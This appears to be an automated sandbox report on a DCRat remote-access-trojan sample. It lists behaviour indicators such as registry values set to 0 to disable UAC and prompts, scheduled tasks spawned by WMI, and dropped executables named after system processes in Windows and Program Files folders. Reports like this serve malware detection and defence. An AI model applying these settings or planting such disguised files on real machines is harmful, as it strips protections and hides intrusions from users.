Malware Analysis Report

2024-11-13 13:42

Sample ID 240516-cdckxsfd3w
Target 78e93535702e2a553d85bac1d4737210_NeikiAnalytics
SHA256 b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
Tags
rat dcrat evasion execution infostealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb

Threat Level: Known bad

The file 78e93535702e2a553d85bac1d4737210_NeikiAnalytics was found to be: Known bad.

Malicious Activity Summary

rat dcrat evasion execution infostealer trojan

Dcrat family

Process spawned unexpected child process

DcRat

DCRat payload

UAC bypass

DCRat payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

System policy modification

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-16 01:57

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-16 01:57

Reported

2024-05-16 01:59

Platform

win7-20240220-en

Max time kernel

148s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Uninstall Information\c5b4cb5e9653cc C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX2273.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Games\Minesweeper\ja-JP\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\ja-JP\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows NT\Accessories\en-US\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Uninstall Information\RCX35DD.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows NT\Accessories\en-US\RCX3EC6.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Uninstall Information\services.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\RCX37E0.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Uninstall Information\services.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Minesweeper\ja-JP\RCX2B5C.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\ja-JP\RCX2D60.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Offline Web Pages\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Offline Web Pages\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\debug\WIA\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\debug\WIA\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\security\templates\csrss.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Migration\WTR\RCX1E6B.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Offline Web Pages\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Media\Festival\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\RCX4137.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\security\templates\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\L2Schemas\explorer.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\L2Schemas\7a0fd90576e088 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\debug\WIA\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Media\Festival\RCX33D9.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\debug\WIA\RCX28EB.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\explorer.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
